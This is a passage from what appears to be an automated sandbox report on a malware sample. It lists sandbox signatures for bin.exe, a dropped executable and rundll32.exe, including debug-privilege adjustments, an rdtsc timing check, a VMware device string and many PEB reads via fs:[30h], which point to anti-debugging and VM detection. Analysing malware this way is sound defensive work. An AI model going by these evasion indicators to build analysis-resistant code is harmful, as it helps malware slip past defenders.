Source: explorer.exe, 00000004.00000000.509787707.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00018ED0 rdtsc 3_2_00018ED0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E3B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00E3B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E3B8D0 mov ecx, dword ptr fs:[00000030h] 3_2_00E3B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DA58EC mov eax, dword ptr fs:[00000030h] 3_2_00DA58EC
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DA9080 mov eax, dword ptr fs:[00000030h] 3_2_00DA9080
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DDF0BF mov ecx, dword ptr fs:[00000030h] 3_2_00DDF0BF
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DDF0BF mov eax, dword ptr fs:[00000030h] 3_2_00DDF0BF
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E23884 mov eax, dword ptr fs:[00000030h] 3_2_00E23884
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE90AF mov eax, dword ptr fs:[00000030h] 3_2_00DE90AF
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD20A0 mov eax, dword ptr fs:[00000030h] 3_2_00DD20A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DC0050 mov eax, dword ptr fs:[00000030h] 3_2_00DC0050
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E71074 mov eax, dword ptr fs:[00000030h] 3_2_00E71074
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E62073 mov eax, dword ptr fs:[00000030h] 3_2_00E62073
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD002D mov eax, dword ptr fs:[00000030h] 3_2_00DD002D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DBB02A mov eax, dword ptr fs:[00000030h] 3_2_00DBB02A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E74015 mov eax, dword ptr fs:[00000030h] 3_2_00E74015
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E27016 mov eax, dword ptr fs:[00000030h] 3_2_00E27016
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E341E8 mov eax, dword ptr fs:[00000030h] 3_2_00E341E8
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DAB1E1 mov eax, dword ptr fs:[00000030h] 3_2_00DAB1E1
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E269A6 mov eax, dword ptr fs:[00000030h] 3_2_00E269A6
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD2990 mov eax, dword ptr fs:[00000030h] 3_2_00DD2990
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DDA185 mov eax, dword ptr fs:[00000030h] 3_2_00DDA185
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E251BE mov eax, dword ptr fs:[00000030h] 3_2_00E251BE
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DCC182 mov eax, dword ptr fs:[00000030h] 3_2_00DCC182
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD61A0 mov eax, dword ptr fs:[00000030h] 3_2_00DD61A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DCB944 mov eax, dword ptr fs:[00000030h] 3_2_00DCB944
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DAB171 mov eax, dword ptr fs:[00000030h] 3_2_00DAB171
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DAC962 mov eax, dword ptr fs:[00000030h] 3_2_00DAC962
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DA9100 mov eax, dword ptr fs:[00000030h] 3_2_00DA9100
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD513A mov eax, dword ptr fs:[00000030h] 3_2_00DD513A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DC4120 mov eax, dword ptr fs:[00000030h] 3_2_00DC4120
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DC4120 mov ecx, dword ptr fs:[00000030h] 3_2_00DC4120
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD2ACB mov eax, dword ptr fs:[00000030h] 3_2_00DD2ACB
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD2AE4 mov eax, dword ptr fs:[00000030h] 3_2_00DD2AE4
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DDD294 mov eax, dword ptr fs:[00000030h] 3_2_00DDD294
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DBAAB0 mov eax, dword ptr fs:[00000030h] 3_2_00DBAAB0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DDFAB0 mov eax, dword ptr fs:[00000030h] 3_2_00DDFAB0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DA52A5 mov eax, dword ptr fs:[00000030h] 3_2_00DA52A5
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E5B260 mov eax, dword ptr fs:[00000030h] 3_2_00E5B260
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E78A62 mov eax, dword ptr fs:[00000030h] 3_2_00E78A62
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DA9240 mov eax, dword ptr fs:[00000030h] 3_2_00DA9240
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE927A mov eax, dword ptr fs:[00000030h] 3_2_00DE927A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E6EA55 mov eax, dword ptr fs:[00000030h] 3_2_00E6EA55
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E34257 mov eax, dword ptr fs:[00000030h] 3_2_00E34257
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DC3A1C mov eax, dword ptr fs:[00000030h] 3_2_00DC3A1C
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DA5210 mov eax, dword ptr fs:[00000030h] 3_2_00DA5210
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DA5210 mov ecx, dword ptr fs:[00000030h] 3_2_00DA5210
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DAAA16 mov eax, dword ptr fs:[00000030h] 3_2_00DAAA16
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DB8A0A mov eax, dword ptr fs:[00000030h] 3_2_00DB8A0A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE4A2C mov eax, dword ptr fs:[00000030h] 3_2_00DE4A2C
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E253CA mov eax, dword ptr fs:[00000030h] 3_2_00E253CA
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DCDBE9 mov eax, dword ptr fs:[00000030h] 3_2_00DCDBE9
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD03E2 mov eax, dword ptr fs:[00000030h] 3_2_00DD03E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E75BA5 mov eax, dword ptr fs:[00000030h] 3_2_00E75BA5
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD2397 mov eax, dword ptr fs:[00000030h] 3_2_00DD2397
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DDB390 mov eax, dword ptr fs:[00000030h] 3_2_00DDB390
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DB1B8F mov eax, dword ptr fs:[00000030h] 3_2_00DB1B8F
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E5D380 mov ecx, dword ptr fs:[00000030h] 3_2_00E5D380
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E6138A mov eax, dword ptr fs:[00000030h] 3_2_00E6138A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD4BAD mov eax, dword ptr fs:[00000030h] 3_2_00DD4BAD
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DAF358 mov eax, dword ptr fs:[00000030h] 3_2_00DAF358
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DADB40 mov eax, dword ptr fs:[00000030h] 3_2_00DADB40
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD3B7A mov eax, dword ptr fs:[00000030h] 3_2_00DD3B7A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DADB60 mov ecx, dword ptr fs:[00000030h] 3_2_00DADB60
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E78B58 mov eax, dword ptr fs:[00000030h] 3_2_00E78B58
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E6131B mov eax, dword ptr fs:[00000030h] 3_2_00E6131B
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E26CF0 mov eax, dword ptr fs:[00000030h] 3_2_00E26CF0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E26CF0 mov eax, dword ptr fs:[00000030h] 3_2_00E26CF0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E26CF0 mov eax, dword ptr fs:[00000030h] 3_2_00E26CF0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E614FB mov eax, dword ptr fs:[00000030h] 3_2_00E614FB
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E78CD6 mov eax, dword ptr fs:[00000030h] 3_2_00E78CD6
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DB849B mov eax, dword ptr fs:[00000030h] 3_2_00DB849B
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DDA44B mov eax, dword ptr fs:[00000030h] 3_2_00DDA44B
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DC746D mov eax, dword ptr fs:[00000030h] 3_2_00DC746D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E3C450 mov eax, dword ptr fs:[00000030h] 3_2_00E3C450
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E3C450 mov eax, dword ptr fs:[00000030h] 3_2_00E3C450
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E26C0A mov eax, dword ptr fs:[00000030h] 3_2_00E26C0A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E26C0A mov eax, dword ptr fs:[00000030h] 3_2_00E26C0A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E26C0A mov eax, dword ptr fs:[00000030h] 3_2_00E26C0A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E26C0A mov eax, dword ptr fs:[00000030h] 3_2_00E26C0A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E7740D mov eax, dword ptr fs:[00000030h] 3_2_00E7740D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E7740D mov eax, dword ptr fs:[00000030h] 3_2_00E7740D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E7740D mov eax, dword ptr fs:[00000030h] 3_2_00E7740D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DDBC2C mov eax, dword ptr fs:[00000030h] 3_2_00DDBC2C
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E6FDE2 mov eax, dword ptr fs:[00000030h] 3_2_00E6FDE2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E6FDE2 mov eax, dword ptr fs:[00000030h] 3_2_00E6FDE2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E6FDE2 mov eax, dword ptr fs:[00000030h] 3_2_00E6FDE2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E6FDE2 mov eax, dword ptr fs:[00000030h] 3_2_00E6FDE2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E58DF1 mov eax, dword ptr fs:[00000030h] 3_2_00E58DF1
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E26DC9 mov eax, dword ptr fs:[00000030h] 3_2_00E26DC9
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E26DC9 mov eax, dword ptr fs:[00000030h] 3_2_00E26DC9
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E26DC9 mov eax, dword ptr fs:[00000030h] 3_2_00E26DC9
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E26DC9 mov ecx, dword ptr fs:[00000030h] 3_2_00E26DC9
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E26DC9 mov eax, dword ptr fs:[00000030h] 3_2_00E26DC9
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E26DC9 mov eax, dword ptr fs:[00000030h] 3_2_00E26DC9
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DBD5E0 mov eax, dword ptr fs:[00000030h] 3_2_00DBD5E0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DBD5E0 mov eax, dword ptr fs:[00000030h] 3_2_00DBD5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438BC2C mov eax, dword ptr fs:[00000030h] 13_2_0438BC2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438002D mov eax, dword ptr fs:[00000030h] 13_2_0438002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438002D mov eax, dword ptr fs:[00000030h] 13_2_0438002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438002D mov eax, dword ptr fs:[00000030h] 13_2_0438002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438002D mov eax, dword ptr fs:[00000030h] 13_2_0438002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438002D mov eax, dword ptr fs:[00000030h] 13_2_0438002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0436B02A mov eax, dword ptr fs:[00000030h] 13_2_0436B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0436B02A mov eax, dword ptr fs:[00000030h] 13_2_0436B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0436B02A mov eax, dword ptr fs:[00000030h] 13_2_0436B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0436B02A mov eax, dword ptr fs:[00000030h] 13_2_0436B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D7016 mov eax, dword ptr fs:[00000030h] 13_2_043D7016
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D7016 mov eax, dword ptr fs:[00000030h] 13_2_043D7016
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D7016 mov eax, dword ptr fs:[00000030h] 13_2_043D7016
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04412073 mov eax, dword ptr fs:[00000030h] 13_2_04412073
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04421074 mov eax, dword ptr fs:[00000030h] 13_2_04421074
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D6C0A mov eax, dword ptr fs:[00000030h] 13_2_043D6C0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D6C0A mov eax, dword ptr fs:[00000030h] 13_2_043D6C0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D6C0A mov eax, dword ptr fs:[00000030h] 13_2_043D6C0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D6C0A mov eax, dword ptr fs:[00000030h] 13_2_043D6C0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0442740D mov eax, dword ptr fs:[00000030h] 13_2_0442740D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0442740D mov eax, dword ptr fs:[00000030h] 13_2_0442740D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0442740D mov eax, dword ptr fs:[00000030h] 13_2_0442740D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04424015 mov eax, dword ptr fs:[00000030h] 13_2_04424015
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04424015 mov eax, dword ptr fs:[00000030h] 13_2_04424015
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0437746D mov eax, dword ptr fs:[00000030h] 13_2_0437746D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04370050 mov eax, dword ptr fs:[00000030h] 13_2_04370050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04370050 mov eax, dword ptr fs:[00000030h] 13_2_04370050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043EC450 mov eax, dword ptr fs:[00000030h] 13_2_043EC450
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043EC450 mov eax, dword ptr fs:[00000030h] 13_2_043EC450
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438A44B mov eax, dword ptr fs:[00000030h] 13_2_0438A44B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438F0BF mov ecx, dword ptr fs:[00000030h] 13_2_0438F0BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438F0BF mov eax, dword ptr fs:[00000030h] 13_2_0438F0BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438F0BF mov eax, dword ptr fs:[00000030h] 13_2_0438F0BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04428CD6 mov eax, dword ptr fs:[00000030h] 13_2_04428CD6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043990AF mov eax, dword ptr fs:[00000030h] 13_2_043990AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043820A0 mov eax, dword ptr fs:[00000030h] 13_2_043820A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043820A0 mov eax, dword ptr fs:[00000030h] 13_2_043820A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043820A0 mov eax, dword ptr fs:[00000030h] 13_2_043820A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043820A0 mov eax, dword ptr fs:[00000030h] 13_2_043820A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043820A0 mov eax, dword ptr fs:[00000030h] 13_2_043820A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043820A0 mov eax, dword ptr fs:[00000030h] 13_2_043820A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0436849B mov eax, dword ptr fs:[00000030h] 13_2_0436849B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04359080 mov eax, dword ptr fs:[00000030h] 13_2_04359080
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D3884 mov eax, dword ptr fs:[00000030h] 13_2_043D3884
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D3884 mov eax, dword ptr fs:[00000030h] 13_2_043D3884
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_044114FB mov eax, dword ptr fs:[00000030h] 13_2_044114FB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D6CF0 mov eax, dword ptr fs:[00000030h] 13_2_043D6CF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D6CF0 mov eax, dword ptr fs:[00000030h] 13_2_043D6CF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D6CF0 mov eax, dword ptr fs:[00000030h] 13_2_043D6CF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043558EC mov eax, dword ptr fs:[00000030h] 13_2_043558EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043EB8D0 mov eax, dword ptr fs:[00000030h] 13_2_043EB8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043EB8D0 mov ecx, dword ptr fs:[00000030h] 13_2_043EB8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043EB8D0 mov eax, dword ptr fs:[00000030h] 13_2_043EB8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043EB8D0 mov eax, dword ptr fs:[00000030h] 13_2_043EB8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043EB8D0 mov eax, dword ptr fs:[00000030h] 13_2_043EB8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043EB8D0 mov eax, dword ptr fs:[00000030h] 13_2_043EB8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438513A mov eax, dword ptr fs:[00000030h] 13_2_0438513A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438513A mov eax, dword ptr fs:[00000030h] 13_2_0438513A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04363D34 mov eax, dword ptr fs:[00000030h] 13_2_04363D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04363D34 mov eax, dword ptr fs:[00000030h] 13_2_04363D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04363D34 mov eax, dword ptr fs:[00000030h] 13_2_04363D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04363D34 mov eax, dword ptr fs:[00000030h] 13_2_04363D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04363D34 mov eax, dword ptr fs:[00000030h] 13_2_04363D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04363D34 mov eax, dword ptr fs:[00000030h] 13_2_04363D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04363D34 mov eax, dword ptr fs:[00000030h] 13_2_04363D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04363D34 mov eax, dword ptr fs:[00000030h] 13_2_04363D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04363D34 mov eax, dword ptr fs:[00000030h] 13_2_04363D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04363D34 mov eax, dword ptr fs:[00000030h] 13_2_04363D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04363D34 mov eax, dword ptr fs:[00000030h] 13_2_04363D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04363D34 mov eax, dword ptr fs:[00000030h] 13_2_04363D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04363D34 mov eax, dword ptr fs:[00000030h] 13_2_04363D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04384D3B mov eax, dword ptr fs:[00000030h] 13_2_04384D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04384D3B mov eax, dword ptr fs:[00000030h] 13_2_04384D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04384D3B mov eax, dword ptr fs:[00000030h] 13_2_04384D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0435AD30 mov eax, dword ptr fs:[00000030h] 13_2_0435AD30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043DA537 mov eax, dword ptr fs:[00000030h] 13_2_043DA537
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04374120 mov eax, dword ptr fs:[00000030h] 13_2_04374120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04374120 mov eax, dword ptr fs:[00000030h] 13_2_04374120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04374120 mov eax, dword ptr fs:[00000030h] 13_2_04374120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04374120 mov eax, dword ptr fs:[00000030h] 13_2_04374120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04374120 mov ecx, dword ptr fs:[00000030h] 13_2_04374120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04359100 mov eax, dword ptr fs:[00000030h] 13_2_04359100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04359100 mov eax, dword ptr fs:[00000030h] 13_2_04359100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04359100 mov eax, dword ptr fs:[00000030h] 13_2_04359100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0437C577 mov eax, dword ptr fs:[00000030h] 13_2_0437C577
